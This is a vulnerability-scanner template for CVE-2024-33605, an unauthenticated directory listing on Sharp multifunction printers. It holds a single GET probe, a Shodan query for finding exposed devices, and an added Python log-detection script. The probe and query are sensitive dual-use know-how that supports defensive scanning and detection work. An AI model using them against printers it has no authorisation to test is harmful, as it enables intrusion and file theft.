Vulnerability Description
It was observed that Sharp printers are vulnerable to an arbitrary directory listing without authentication. Any attacker can list any directory located in the printer and recover any file.
id: CVE-2024-33605
info:
  name: Sharp Multifunction Printers - Directory Listing
  author: gy741
  severity: high
  description: |
    It was observed that Sharp printers are vulnerable to an arbitrary directory listing without authentication. Any attacker can list any directory located in the printer and recover any file.
  remediation: |
    Apply all relevant security patches and product upgrades.
  reference:
    - https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-arbitrary-directory-listing
    - https://jvn.jp/en/vu/JVNVU93051062/index.html
    - https://global.sharp/products/copier/info/info_security_2024-05.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-33605
    cwe-id: CWE-22
    epss-score: 0.56595
    epss-percentile: 0.98051
    cpe: cpe:2.3:o:sharp:mx-3550v_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: "Set-Cookie: MFPSESSIONID="
    product: mx-3550v_firmware
    vendor: sharp
  tags: cve,cve2024,sharp,printer,traversal
http:
  - method: GET
    path:
      - "{{BaseURL}}/installed_emanual_list.html"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ServiceEmanualList'
          - '/installed_emanual_down.html'
        condition: and
      - type: word
        part: header
        words:
          - "Set-Cookie: MFPSESSIONID="
      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ecc2736852f6d6d868c67ef8b92b86cec9f0d1451581a7511a81f8e7d44ebc96022029464d3d36bc5df2bbc34aa7eed728d47f9e798dda3e45d0c6dbf244f6e56aa4:922c64590222798bb761d5b6d8e72950
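As an added example (not part of the original template or of the Nuclei project), the following log check flags requests for the two paths the template keys on. It assumes Apache/nginx combined-format access logs from a reverse proxy or gateway in front of the printers; the function names, the allow-list parameter and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Paths come from the template above; everything else here is an assumption.
WATCHED_PATHS = ("/installed_emanual_list.html", "/installed_emanual_down.html")

# Assumed log format: Apache/nginx "combined" lines written by a reverse proxy
# or web gateway that sits in front of the printers.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_emanual_hits(lines, allowed_sources=()):
    """Return {source: [(timestamp, path, status), ...]} for the watched paths."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed format, skip
        path = m["target"].split("?", 1)[0].lower()  # drop any query string
        if path not in WATCHED_PATHS or m["src"] in allowed_sources:
            continue  # unrelated page, or an approved internal scanner
        hits[m["src"]].append((m["ts"], path, int(m["status"])))
    return dict(hits)

def successful_sources(hits):
    """Sources that got at least one HTTP 200, i.e. the page was served to them."""
    return sorted(s for s, rows in hits.items() if any(r[2] == 200 for r in rows))

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Jun/2024:10:01:02 +0000] "GET /installed_emanual_list.html HTTP/1.1" 200 5120 "-" "curl/8.0"',
    '198.51.100.7 - - [27/Jun/2024:10:01:05 +0000] "GET /installed_emanual_down.html HTTP/1.1" 200 20480 "-" "curl/8.0"',
    '192.0.2.10 - - [27/Jun/2024:10:02:00 +0000] "GET /installed_emanual_list.html HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
    '192.0.2.50 - - [27/Jun/2024:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/Jun/2024:10:04:00 +0000] "GET /installed_emanual_list.html HTTP/1.1" 200 5120 "-" "scanner"',
]

if __name__ == "__main__":
    found = find_emanual_hits(SAMPLE_LOG, allowed_sources={"203.0.113.5"})
    for src in successful_sources(found):
        print(src, found[src])
```

A source that receives a 200 for these pages without belonging to the allow-list is the case to triage first, since the template treats a 200 with the expected body as confirmation that the listing is reachable without authentication.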